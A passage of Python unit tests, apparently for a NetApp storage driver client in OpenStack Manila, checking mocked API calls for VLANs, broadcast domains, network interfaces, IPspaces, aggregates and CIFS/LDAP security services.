self.client._terminate_vserver_services(fake.VSERVER_NAME,
self.vserver_client,
[fake.CIFS_SECURITY_SERVICE])
cifs_server_delete_args = {
'admin-password': fake.CIFS_SECURITY_SERVICE['password'],
'admin-username': fake.CIFS_SECURITY_SERVICE['user'],
}
self.vserver_client.send_request.assert_has_calls([
mock.call('cifs-server-delete', cifs_server_delete_args)])
def test_terminate_vserver_services_cifs_not_found(self):
self.mock_object(self.vserver_client,
'send_request',
self._mock_api_error(
code=netapp_api.EOBJECTNOTFOUND))
self.client._terminate_vserver_services(fake.VSERVER_NAME,
self.vserver_client,
[fake.CIFS_SECURITY_SERVICE])
cifs_server_delete_args = {
'admin-password': fake.CIFS_SECURITY_SERVICE['password'],
'admin-username': fake.CIFS_SECURITY_SERVICE['user'],
}
self.vserver_client.send_request.assert_has_calls([
mock.call('cifs-server-delete', cifs_server_delete_args)])
self.assertEqual(1, client_cmode.LOG.error.call_count)
def test_terminate_vserver_services_api_error(self):
side_effects = [netapp_api.NaApiError(code='fake'), None]
self.mock_object(self.vserver_client,
'send_request',
mock.Mock(side_effect=side_effects))
self.client._terminate_vserver_services(fake.VSERVER_NAME,
self.vserver_client,
[fake.CIFS_SECURITY_SERVICE])
cifs_server_delete_args = {
'admin-password': fake.CIFS_SECURITY_SERVICE['password'],
'admin-username': fake.CIFS_SECURITY_SERVICE['user'],
}
self.vserver_client.send_request.assert_has_calls([
mock.call('cifs-server-delete', cifs_server_delete_args),
mock.call('cifs-server-delete')])
self.assertEqual(0, client_cmode.LOG.error.call_count)
def test_list_cluster_nodes(self):
api_response = netapp_api.NaElement(
fake.SYSTEM_NODE_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.list_cluster_nodes()
self.assertListEqual([fake.NODE_NAME], result)
def test_list_cluster_nodes_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.list_cluster_nodes()
self.assertListEqual([], result)
def test_list_node_data_ports(self):
self.mock_object(self.client,
'get_node_data_ports',
mock.Mock(return_value=fake.SPEED_SORTED_PORTS))
result = self.client.list_node_data_ports(fake.NODE_NAME)
self.assertSequenceEqual(fake.SPEED_SORTED_PORT_NAMES, result)
def test_get_node_data_ports(self):
api_response = netapp_api.NaElement(fake.NET_PORT_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_node_data_ports(fake.NODE_NAME)
net_port_get_iter_args = {
'query': {
'net-port-info': {
'node': fake.NODE_NAME,
'link-status': 'up',
'port-type': 'physical|if_group',
'role': 'data',
},
},
'desired-attributes': {
'net-port-info': {
'port': None,
'node': None,
'operational-speed': None,
'ifgrp-port': None,
},
},
}
self.assertSequenceEqual(fake.SPEED_SORTED_PORTS, result)
self.client.send_iter_request.assert_has_calls([
mock.call('net-port-get-iter', net_port_get_iter_args)])
def test_get_node_data_ports_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_node_data_ports(fake.NODE_NAME)
self.assertSequenceEqual([], result)
def test_sort_data_ports_by_speed(self):
result = self.client._sort_data_ports_by_speed(
fake.UNSORTED_PORTS_ALL_SPEEDS)
self.assertSequenceEqual(fake.SORTED_PORTS_ALL_SPEEDS, result)
def test_list_aggregates(self):
api_response = netapp_api.NaElement(fake.AGGR_GET_NAMES_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.list_aggregates()
self.assertSequenceEqual(fake.SHARE_AGGREGATE_NAMES, result)
def test_list_aggregates_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
self.assertRaises(exception.NetAppException,
self.client.list_aggregates)
def test_list_vserver_aggregates(self):
self.mock_object(self.vserver_client,
'get_vserver_aggregate_capacities',
mock.Mock(return_value=fake.VSERVER_AGGREGATES))
result = self.vserver_client.list_vserver_aggregates()
self.assertListEqual(list(fake.VSERVER_AGGREGATES.keys()), result)
def test_list_vserver_aggregates_none_found(self):
self.mock_object(self.vserver_client,
'get_vserver_aggregate_capacities',
mock.Mock(return_value={}))
result = self.vserver_client.list_vserver_aggregates()
self.assertListEqual([], result)
@ddt.data((True, True), (True, False), (False, True), (False, False))
@ddt.unpack
def test_create_network_interface(self, broadcast_domains_supported,
use_vlans):
self.client.features.add_feature('BROADCAST_DOMAINS',
broadcast_domains_supported)
self.mock_object(self.client, '_ensure_broadcast_domain_for_port')
self.mock_object(self.client, '_create_vlan')
self.mock_object(self.client, 'send_request')
lif_create_args = {
'address': fake.IP_ADDRESS,
'administrative-status': 'up',
'data-protocols': [
{'data-protocol': 'nfs'},
{'data-protocol': 'cifs'}
],
'home-node': fake.NODE_NAME,
'home-port': fake.VLAN_PORT if use_vlans else fake.PORT,
'netmask': fake.NETMASK,
'interface-name': fake.LIF_NAME,
'role': 'data',
'vserver': fake.VSERVER_NAME,
}
self.client.create_network_interface(fake.IP_ADDRESS,
fake.NETMASK,
fake.VLAN if use_vlans else None,
fake.NODE_NAME,
fake.PORT,
fake.VSERVER_NAME,
fake.LIF_NAME,
fake.IPSPACE_NAME)
if use_vlans:
self.client._create_vlan.assert_called_with(
fake.NODE_NAME, fake.PORT, fake.VLAN)
else:
self.assertFalse(self.client._create_vlan.called)
if broadcast_domains_supported:
self.client._ensure_broadcast_domain_for_port.assert_called_with(
fake.NODE_NAME, fake.VLAN_PORT if use_vlans else fake.PORT,
ipspace=fake.IPSPACE_NAME)
else:
self.assertFalse(
self.client._ensure_broadcast_domain_for_port.called)
self.client.send_request.assert_has_calls([
mock.call('net-interface-create', lif_create_args)])
def test_create_vlan(self):
self.mock_object(self.client, 'send_request')
vlan_create_args = {
'vlan-info': {
'parent-interface': fake.PORT,
'node': fake.NODE_NAME,
'vlanid': fake.VLAN
}
}
self.client._create_vlan(fake.NODE_NAME, fake.PORT, fake.VLAN)
self.client.send_request.assert_has_calls([
mock.call('net-vlan-create', vlan_create_args)])
def test_create_vlan_already_present(self):
self.mock_object(self.client,
'send_request',
self._mock_api_error(code=netapp_api.EDUPLICATEENTRY))
vlan_create_args = {
'vlan-info': {
'parent-interface': fake.PORT,
'node': fake.NODE_NAME,
'vlanid': fake.VLAN
}
}
self.client._create_vlan(fake.NODE_NAME, fake.PORT, fake.VLAN)
self.client.send_request.assert_has_calls([
mock.call('net-vlan-create', vlan_create_args)])
self.assertEqual(1, client_cmode.LOG.debug.call_count)
def test_create_vlan_api_error(self):
self.mock_object(self.client, 'send_request', self._mock_api_error())
self.assertRaises(exception.NetAppException,
self.client._create_vlan,
fake.NODE_NAME,
fake.PORT,
fake.VLAN)
def test_ensure_broadcast_domain_for_port_domain_match(self):
port_info = {
'ipspace': fake.IPSPACE_NAME,
'broadcast-domain': fake.BROADCAST_DOMAIN,
}
self.mock_object(self.client,
'_get_broadcast_domain_for_port',
mock.Mock(return_value=port_info))
self.mock_object(self.client,
'_broadcast_domain_exists',
mock.Mock(return_value=True))
self.mock_object(self.client, '_create_broadcast_domain')
self.mock_object(self.client, '_add_port_to_broadcast_domain')
self.client._ensure_broadcast_domain_for_port(
fake.NODE_NAME, fake.PORT, domain=fake.BROADCAST_DOMAIN,
ipspace=fake.IPSPACE_NAME)
self.client._get_broadcast_domain_for_port.assert_has_calls([
mock.call(fake.NODE_NAME, fake.PORT)])
self.assertFalse(self.client._broadcast_domain_exists.called)
self.assertFalse(self.client._create_broadcast_domain.called)
self.assertFalse(self.client._add_port_to_broadcast_domain.called)
def test_ensure_broadcast_domain_for_port_other_domain(self):
port_info = {
'ipspace': fake.IPSPACE_NAME,
'broadcast-domain': 'other_domain',
}
self.mock_object(self.client,
'_get_broadcast_domain_for_port',
mock.Mock(return_value=port_info))
self.mock_object(self.client,
'_broadcast_domain_exists',
mock.Mock(return_value=True))
self.mock_object(self.client, '_create_broadcast_domain')
self.mock_object(self.client, '_remove_port_from_broadcast_domain')
self.mock_object(self.client, '_add_port_to_broadcast_domain')
self.client._ensure_broadcast_domain_for_port(
fake.NODE_NAME, fake.PORT, domain=fake.BROADCAST_DOMAIN,
ipspace=fake.IPSPACE_NAME)
self.client._get_broadcast_domain_for_port.assert_has_calls([
mock.call(fake.NODE_NAME, fake.PORT)])
self.client._remove_port_from_broadcast_domain.assert_has_calls([
mock.call(fake.NODE_NAME, fake.PORT, 'other_domain',
fake.IPSPACE_NAME)])
self.client._broadcast_domain_exists.assert_has_calls([
mock.call(fake.BROADCAST_DOMAIN, fake.IPSPACE_NAME)])
self.assertFalse(self.client._create_broadcast_domain.called)
self.client._add_port_to_broadcast_domain.assert_has_calls([
mock.call(fake.NODE_NAME, fake.PORT, fake.BROADCAST_DOMAIN,
fake.IPSPACE_NAME)])
def test_ensure_broadcast_domain_for_port_no_domain(self):
port_info = {
'ipspace': fake.IPSPACE_NAME,
'broadcast-domain': None,
}
self.mock_object(self.client,
'_get_broadcast_domain_for_port',
mock.Mock(return_value=port_info))
self.mock_object(self.client,
'_broadcast_domain_exists',
mock.Mock(return_value=False))
self.mock_object(self.client, '_create_broadcast_domain')
self.mock_object(self.client, '_remove_port_from_broadcast_domain')
self.mock_object(self.client, '_add_port_to_broadcast_domain')
self.client._ensure_broadcast_domain_for_port(
fake.NODE_NAME, fake.PORT, domain=fake.BROADCAST_DOMAIN,
ipspace=fake.IPSPACE_NAME)
self.client._get_broadcast_domain_for_port.assert_has_calls([
mock.call(fake.NODE_NAME, fake.PORT)])
self.assertFalse(self.client._remove_port_from_broadcast_domain.called)
self.client._broadcast_domain_exists.assert_has_calls([
mock.call(fake.BROADCAST_DOMAIN, fake.IPSPACE_NAME)])
self.client._create_broadcast_domain.assert_has_calls([
mock.call(fake.BROADCAST_DOMAIN, fake.IPSPACE_NAME)])
self.client._add_port_to_broadcast_domain.assert_has_calls([
mock.call(fake.NODE_NAME, fake.PORT, fake.BROADCAST_DOMAIN,
fake.IPSPACE_NAME)])
def test_get_broadcast_domain_for_port(self):
api_response = netapp_api.NaElement(
fake.NET_PORT_GET_ITER_BROADCAST_DOMAIN_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
net_port_get_iter_args = {
'query': {
'net-port-info': {
'node': fake.NODE_NAME,
'port': fake.PORT,
},
},
'desired-attributes': {
'net-port-info': {
'broadcast-domain': None,
'ipspace': None,
},
},
}
result = self.client._get_broadcast_domain_for_port(fake.NODE_NAME,
fake.PORT)
expected = {
'broadcast-domain': fake.BROADCAST_DOMAIN,
'ipspace': fake.IPSPACE_NAME,
}
self.client.send_iter_request.assert_has_calls([
mock.call('net-port-get-iter', net_port_get_iter_args)])
self.assertEqual(expected, result)
def test_get_broadcast_domain_for_port_port_not_found(self):
api_response = netapp_api.NaElement(
fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
self.assertRaises(exception.NetAppException,
self.client._get_broadcast_domain_for_port,
fake.NODE_NAME,
fake.PORT)
def test_get_broadcast_domain_for_port_domain_not_found(self):
api_response = netapp_api.NaElement(
fake.NET_PORT_GET_ITER_BROADCAST_DOMAIN_MISSING_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client._get_broadcast_domain_for_port(fake.NODE_NAME,
fake.PORT)
expected = {
'broadcast-domain': None,
'ipspace': fake.IPSPACE_NAME,
}
self.assertEqual(expected, result)
def test_broadcast_domain_exists(self):
api_response = netapp_api.NaElement(
fake.NET_PORT_BROADCAST_DOMAIN_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client._broadcast_domain_exists(fake.BROADCAST_DOMAIN,
fake.IPSPACE_NAME)
net_port_broadcast_domain_get_iter_args = {
'query': {
'net-port-broadcast-domain-info': {
'ipspace': fake.IPSPACE_NAME,
'broadcast-domain': fake.BROADCAST_DOMAIN,
},
},
'desired-attributes': {
'net-port-broadcast-domain-info': None,
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('net-port-broadcast-domain-get-iter',
net_port_broadcast_domain_get_iter_args)])
self.assertTrue(result)
def test_broadcast_domain_exists_not_found(self):
api_response = netapp_api.NaElement(
fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client._broadcast_domain_exists(fake.BROADCAST_DOMAIN,
fake.IPSPACE_NAME)
self.assertFalse(result)
def test_create_broadcast_domain(self):
self.mock_object(self.client, 'send_request')
result = self.client._create_broadcast_domain(fake.BROADCAST_DOMAIN,
fake.IPSPACE_NAME,
mtu=fake.MTU)
net_port_broadcast_domain_create_args = {
'ipspace': fake.IPSPACE_NAME,
'broadcast-domain': fake.BROADCAST_DOMAIN,
'mtu': fake.MTU,
}
self.assertIsNone(result)
self.client.send_request.assert_has_calls([
mock.call('net-port-broadcast-domain-create',
net_port_broadcast_domain_create_args)])
def test_delete_broadcast_domain(self):
self.mock_object(self.client, 'send_request')
result = self.client._delete_broadcast_domain(fake.BROADCAST_DOMAIN,
fake.IPSPACE_NAME)
net_port_broadcast_domain_delete_args = {
'ipspace': fake.IPSPACE_NAME,
'broadcast-domain': fake.BROADCAST_DOMAIN,
}
self.assertIsNone(result)
self.client.send_request.assert_has_calls([
mock.call('net-port-broadcast-domain-destroy',
net_port_broadcast_domain_delete_args)])
def test_delete_broadcast_domains_for_ipspace_not_found(self):
self.mock_object(self.client,
'get_ipspaces',
mock.Mock(return_value=[]))
self.mock_object(self.client, '_delete_broadcast_domain')
self.client._delete_broadcast_domains_for_ipspace(fake.IPSPACE_NAME)
self.client.get_ipspaces.assert_called_once_with(
ipspace_name=fake.IPSPACE_NAME)
self.assertFalse(self.client._delete_broadcast_domain.called)
def test_delete_broadcast_domains_for_ipspace(self):
self.mock_object(self.client,
'get_ipspaces',
mock.Mock(return_value=fake.IPSPACES))
self.mock_object(self.client, '_delete_broadcast_domain')
self.client._delete_broadcast_domains_for_ipspace(fake.IPSPACE_NAME)
self.client.get_ipspaces.assert_called_once_with(
ipspace_name=fake.IPSPACE_NAME)
self.client._delete_broadcast_domain.assert_called_once_with(
fake.IPSPACES[0]['broadcast-domains'][0], fake.IPSPACE_NAME)
def test_add_port_to_broadcast_domain(self):
self.mock_object(self.client, 'send_request')
add_port_to_broadcast_domain_args = {
'ipspace': fake.IPSPACE_NAME,
'broadcast-domain': fake.BROADCAST_DOMAIN,
'ports': {
'net-qualified-port-name': ':'.join([fake.NODE_NAME,
fake.VLAN_PORT])
}
}
result = self.client._add_port_to_broadcast_domain(
fake.NODE_NAME, fake.VLAN_PORT, fake.BROADCAST_DOMAIN,
fake.IPSPACE_NAME)
self.assertIsNone(result)
self.client.send_request.assert_has_calls([
mock.call('net-port-broadcast-domain-add-ports',
add_port_to_broadcast_domain_args)])
def test_add_port_to_broadcast_domain_already_present(self):
self.mock_object(self.client, 'send_request', self._mock_api_error(
code=netapp_api.
E_VIFMGR_PORT_ALREADY_ASSIGNED_TO_BROADCAST_DOMAIN))
result = self.client._add_port_to_broadcast_domain(
fake.NODE_NAME, fake.VLAN_PORT, fake.BROADCAST_DOMAIN,
fake.IPSPACE_NAME)
self.assertIsNone(result)
def test_add_port_to_broadcast_domain_api_error(self):
self.mock_object(self.client, 'send_request', self._mock_api_error())
self.assertRaises(exception.NetAppException,
self.client._add_port_to_broadcast_domain,
fake.NODE_NAME,
fake.VLAN_PORT,
fake.BROADCAST_DOMAIN,
fake.IPSPACE_NAME)
def test_remove_port_from_broadcast_domain(self):
self.mock_object(self.client, 'send_request')
result = self.client._remove_port_from_broadcast_domain(
fake.NODE_NAME, fake.VLAN_PORT, fake.BROADCAST_DOMAIN,
fake.IPSPACE_NAME)
net_port_broadcast_domain_remove_ports_args = {
'ipspace': fake.IPSPACE_NAME,
'broadcast-domain': fake.BROADCAST_DOMAIN,
'ports': {
'net-qualified-port-name': ':'.join([fake.NODE_NAME,
fake.VLAN_PORT])
}
}
self.assertIsNone(result)
self.client.send_request.assert_has_calls([
mock.call('net-port-broadcast-domain-remove-ports',
net_port_broadcast_domain_remove_ports_args)])
def test_network_interface_exists(self):
api_response = netapp_api.NaElement(
fake.NET_INTERFACE_GET_ONE_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
net_interface_get_args = {
'query': {
'net-interface-info': {
'address': fake.IP_ADDRESS,
'home-node': fake.NODE_NAME,
'home-port': fake.VLAN_PORT,
'netmask': fake.NETMASK,
'vserver': fake.VSERVER_NAME}
},
'desired-attributes': {
'net-interface-info': {
'interface-name': None,
}
}
}
result = self.client.network_interface_exists(
fake.VSERVER_NAME, fake.NODE_NAME, fake.PORT, fake.IP_ADDRESS,
fake.NETMASK, fake.VLAN)
self.client.send_iter_request.assert_has_calls([
mock.call('net-interface-get-iter', net_interface_get_args)])
self.assertTrue(result)
def test_network_interface_exists_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
net_interface_get_args = {
'query': {
'net-interface-info': {
'address': fake.IP_ADDRESS,
'home-node': fake.NODE_NAME,
'home-port': fake.PORT,
'netmask': fake.NETMASK,
'vserver': fake.VSERVER_NAME}
},
'desired-attributes': {
'net-interface-info': {
'interface-name': None,
}
}
}
result = self.client.network_interface_exists(
fake.VSERVER_NAME, fake.NODE_NAME, fake.PORT, fake.IP_ADDRESS,
fake.NETMASK, None)
self.client.send_iter_request.assert_has_calls([
mock.call('net-interface-get-iter', net_interface_get_args)])
self.assertFalse(result)
def test_list_network_interfaces(self):
api_response = netapp_api.NaElement(
fake.NET_INTERFACE_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
net_interface_get_args = {
'desired-attributes': {
'net-interface-info': {
'interface-name': None,
}
}
}
result = self.client.list_network_interfaces()
self.client.send_iter_request.assert_has_calls([
mock.call('net-interface-get-iter', net_interface_get_args)])
self.assertSequenceEqual(fake.LIF_NAMES, result)
def test_list_network_interfaces_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_request',
mock.Mock(return_value=api_response))
result = self.client.list_network_interfaces()
self.assertListEqual([], result)
def test_get_network_interfaces(self):
api_response = netapp_api.NaElement(
fake.NET_INTERFACE_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_network_interfaces()
self.client.send_iter_request.assert_has_calls([
mock.call('net-interface-get-iter', None)])
self.assertSequenceEqual(fake.LIFS, result)
def test_get_network_interfaces_filtered_by_protocol(self):
api_response = netapp_api.NaElement(
fake.NET_INTERFACE_GET_ITER_RESPONSE_NFS)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_network_interfaces(protocols=['NFS'])
net_interface_get_args = {
'query': {
'net-interface-info': {
'data-protocols': {
'data-protocol': 'nfs',
}
}
}
}
self.client.send_iter_request.assert_has_calls([
mock.call('net-interface-get-iter', net_interface_get_args)])
self.assertListEqual(fake.NFS_LIFS, result)
def test_get_network_interfaces_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_network_interfaces()
self.client.send_iter_request.assert_has_calls([
mock.call('net-interface-get-iter', None)])
self.assertListEqual([], result)
def test_get_ipspaces(self):
self.client.features.add_feature('IPSPACES')
api_response = netapp_api.NaElement(
fake.NET_IPSPACES_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_ipspaces(ipspace_name=fake.IPSPACE_NAME)
net_ipspaces_get_iter_args = {
'query': {
'net-ipspaces-info': {
'ipspace': fake.IPSPACE_NAME,
},
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('net-ipspaces-get-iter', net_ipspaces_get_iter_args)])
self.assertEqual(fake.IPSPACES, result)
def test_get_ipspaces_not_found(self):
self.client.features.add_feature('IPSPACES')
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_ipspaces()
net_ipspaces_get_iter_args = {}
self.client.send_iter_request.assert_has_calls([
mock.call('net-ipspaces-get-iter', net_ipspaces_get_iter_args)])
self.assertEqual([], result)
def test_get_ipspaces_not_supported(self):
self.mock_object(self.client, 'send_iter_request')
result = self.client.get_ipspaces()
self.assertFalse(self.client.send_iter_request.called)
self.assertEqual([], result)
@ddt.data((fake.NET_IPSPACES_GET_ITER_RESPONSE, True),
(fake.NO_RECORDS_RESPONSE, False))
@ddt.unpack
def test_ipspace_exists(self, api_response, expected):
self.client.features.add_feature('IPSPACES')
api_response = netapp_api.NaElement(api_response)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.ipspace_exists(fake.IPSPACE_NAME)
net_ipspaces_get_iter_args = {
'query': {
'net-ipspaces-info': {
'ipspace': fake.IPSPACE_NAME,
},
},
'desired-attributes': {
'net-ipspaces-info': {
'ipspace': None,
},
},
}
self.client.send_iter_request.assert_has_calls([
mock.call('net-ipspaces-get-iter', net_ipspaces_get_iter_args)])
self.assertEqual(expected, result)
def test_ipspace_exists_not_supported(self):
result = self.client.ipspace_exists(fake.IPSPACE_NAME)
self.assertFalse(result)
def test_create_ipspace(self):
self.mock_object(self.client, 'send_request')
self.client.create_ipspace(fake.IPSPACE_NAME)
net_ipspaces_create_args = {'ipspace': fake.IPSPACE_NAME}
self.client.send_request.assert_has_calls([
mock.call('net-ipspaces-create', net_ipspaces_create_args)])
def test_delete_ipspace(self):
mock_delete_broadcast_domains_for_ipspace = self.mock_object(
self.client, '_delete_broadcast_domains_for_ipspace')
self.mock_object(self.client, 'send_request')
self.client.delete_ipspace(fake.IPSPACE_NAME)
net_ipspaces_destroy_args = {'ipspace': fake.IPSPACE_NAME}
mock_delete_broadcast_domains_for_ipspace.assert_called_once_with(
fake.IPSPACE_NAME)
self.client.send_request.assert_has_calls([
mock.call('net-ipspaces-destroy', net_ipspaces_destroy_args)])
def test_add_vserver_to_ipspace(self):
self.mock_object(self.client, 'send_request')
self.client.add_vserver_to_ipspace(fake.IPSPACE_NAME,
fake.VSERVER_NAME)
net_ipspaces_assign_vserver_args = {
'ipspace': fake.IPSPACE_NAME,
'vserver': fake.VSERVER_NAME
}
self.client.send_request.assert_has_calls([
mock.call('net-ipspaces-assign-vserver',
net_ipspaces_assign_vserver_args)])
def test_get_node_for_aggregate(self):
api_response = netapp_api.NaElement(
fake.AGGR_GET_NODE_RESPONSE).get_child_by_name(
'attributes-list').get_children()
self.mock_object(self.client,
'_get_aggregates',
mock.Mock(return_value=api_response))
result = self.client.get_node_for_aggregate(fake.SHARE_AGGREGATE_NAME)
desired_attributes = {
'aggr-attributes': {
'aggregate-name': None,
'aggr-ownership-attributes': {
'home-name': None,
},
},
}
self.client._get_aggregates.assert_has_calls([
mock.call(
aggregate_names=[fake.SHARE_AGGREGATE_NAME],
desired_attributes=desired_attributes)])
self.assertEqual(fake.NODE_NAME, result)
def test_get_node_for_aggregate_none_requested(self):
result = self.client.get_node_for_aggregate(None)
self.assertIsNone(result)
def test_get_node_for_aggregate_api_not_found(self):
self.mock_object(self.client,
'send_iter_request',
mock.Mock(side_effect=self._mock_api_error(
netapp_api.EAPINOTFOUND)))
result = self.client.get_node_for_aggregate(fake.SHARE_AGGREGATE_NAME)
self.assertIsNone(result)
def test_get_node_for_aggregate_api_error(self):
self.mock_object(self.client,
'send_iter_request',
self._mock_api_error())
self.assertRaises(netapp_api.NaApiError,
self.client.get_node_for_aggregate,
fake.SHARE_AGGREGATE_NAME)
def test_get_node_for_aggregate_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client.get_node_for_aggregate(fake.SHARE_AGGREGATE_NAME)
self.assertIsNone(result)
def test_get_cluster_aggregate_capacities(self):
api_response = netapp_api.NaElement(
fake.AGGR_GET_SPACE_RESPONSE).get_child_by_name(
'attributes-list').get_children()
self.mock_object(self.client,
'_get_aggregates',
mock.Mock(return_value=api_response))
result = self.client.get_cluster_aggregate_capacities(
fake.SHARE_AGGREGATE_NAMES)
desired_attributes = {
'aggr-attributes': {
'aggregate-name': None,
'aggr-space-attributes': {
'size-available': None,
'size-total': None,
'size-used': None,
}
}
}
self.client._get_aggregates.assert_has_calls([
mock.call(
aggregate_names=fake.SHARE_AGGREGATE_NAMES,
desired_attributes=desired_attributes)])
expected = {
fake.SHARE_AGGREGATE_NAMES[0]: {
'available': 45670400,
'total': 943718400,
'used': 898048000,
},
fake.SHARE_AGGREGATE_NAMES[1]: {
'available': 4267659264,
'total': 7549747200,
'used': 3282087936,
},
}
self.assertDictEqual(expected, result)
def test_get_cluster_aggregate_capacities_not_found(self):
api_response = netapp_api.NaElement('none').get_children()
self.mock_object(self.client,
'_get_aggregates',
mock.Mock(return_value=api_response))
result = self.client.get_cluster_aggregate_capacities(
fake.SHARE_AGGREGATE_NAMES)
self.assertEqual({}, result)
def test_get_cluster_aggregate_capacities_none_requested(self):
result = self.client.get_cluster_aggregate_capacities([])
self.assertEqual({}, result)
def test_get_vserver_aggregate_capacities(self):
api_response = netapp_api.NaElement(fake.VSERVER_GET_RESPONSE)
self.mock_object(self.vserver_client,
'send_request',
mock.Mock(return_value=api_response))
result = self.vserver_client.get_vserver_aggregate_capacities()
vserver_args = {
'desired-attributes': {
'vserver-info': {
'vserver-name': None,
'vserver-aggr-info-list': {
'vserver-aggr-info': {
'aggr-name': None,
'aggr-availsize': None
}
}
}
}
}
self.vserver_client.send_request.assert_has_calls([
mock.call('vserver-get', vserver_args)])
self.assertDictEqual(fake.VSERVER_AGGREGATES, result)
def test_get_vserver_aggregate_capacities_partial_request(self):
api_response = netapp_api.NaElement(fake.VSERVER_GET_RESPONSE)
self.mock_object(self.vserver_client,
'send_request',
mock.Mock(return_value=api_response))
result = self.vserver_client.get_vserver_aggregate_capacities(
fake.SHARE_AGGREGATE_NAMES[0])
expected = {fake.SHARE_AGGREGATE_NAMES[0]:
fake.VSERVER_AGGREGATES[fake.SHARE_AGGREGATE_NAMES[0]]}
self.assertDictEqual(expected, result)
def test_get_vserver_aggregate_capacities_aggregate_not_found(self):
api_response = netapp_api.NaElement(
fake.VSERVER_GET_RESPONSE_NO_AGGREGATES)
self.mock_object(self.vserver_client,
'send_request',
mock.Mock(return_value=api_response))
result = self.vserver_client.get_vserver_aggregate_capacities()
self.assertDictEqual({}, result)
self.assertEqual(1, client_cmode.LOG.warning.call_count)
def test_get_vserver_aggregate_capacities_vserver_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.vserver_client,
'send_request',
mock.Mock(return_value=api_response))
self.assertRaises(exception.NetAppException,
self.vserver_client.get_vserver_aggregate_capacities)
def test_get_vserver_aggregate_capacities_none_requested(self):
result = self.client.get_vserver_aggregate_capacities([])
self.assertEqual({}, result)
def test_get_aggregates(self):
api_response = netapp_api.NaElement(fake.AGGR_GET_ITER_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client._get_aggregates()
self.client.send_iter_request.assert_has_calls([
mock.call('aggr-get-iter', {})])
self.assertListEqual(
[aggr.to_string() for aggr in api_response.get_child_by_name(
'attributes-list').get_children()],
[aggr.to_string() for aggr in result])
def test_get_aggregates_with_filters(self):
api_response = netapp_api.NaElement(fake.AGGR_GET_SPACE_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
desired_attributes = {
'aggr-attributes': {
'aggregate-name': None,
'aggr-space-attributes': {
'size-total': None,
'size-available': None,
}
}
}
result = self.client._get_aggregates(
aggregate_names=fake.SHARE_AGGREGATE_NAMES,
desired_attributes=desired_attributes)
aggr_get_iter_args = {
'query': {
'aggr-attributes': {
'aggregate-name': '|'.join(fake.SHARE_AGGREGATE_NAMES),
}
},
'desired-attributes': desired_attributes
}
self.client.send_iter_request.assert_has_calls([
mock.call('aggr-get-iter', aggr_get_iter_args)])
self.assertListEqual(
[aggr.to_string() for aggr in api_response.get_child_by_name(
'attributes-list').get_children()],
[aggr.to_string() for aggr in result])
def test_get_aggregates_not_found(self):
api_response = netapp_api.NaElement(fake.NO_RECORDS_RESPONSE)
self.mock_object(self.client,
'send_iter_request',
mock.Mock(return_value=api_response))
result = self.client._get_aggregates()
self.client.send_iter_request.assert_has_calls([
mock.call('aggr-get-iter', {})])
self.assertListEqual([], result)
def test_setup_security_services_ldap(self):
self.mock_object(self.client, 'send_request')
self.mock_object(self.vserver_client, 'configure_ldap')
self.client.setup_security_services([fake.LDAP_SECURITY_SERVICE],
self.vserver_client,
fake.VSERVER_NAME)
vserver_modify_args = {
'name-mapping-switch': [
{'nmswitch': 'ldap'},
{'nmswitch': 'file'},
],
'name-server-switch': [
{'nsswitch': 'ldap'},
{'nsswitch': 'file'},
],
'vserver-name': fake.VSERVER_NAME
}
self.client.send_request.assert_has_calls([
mock.call('vserver-modify', vserver_modify_args)])
self.vserver_client.configure_ldap.assert_has_calls([
mock.call(fake.LDAP_SECURITY_SERVICE)])
def test_setup_security_services_active_directory(self):
self.mock_object(self.client, 'send_request')
self.mock_object(self.vserver_client, 'configure_active_directory')
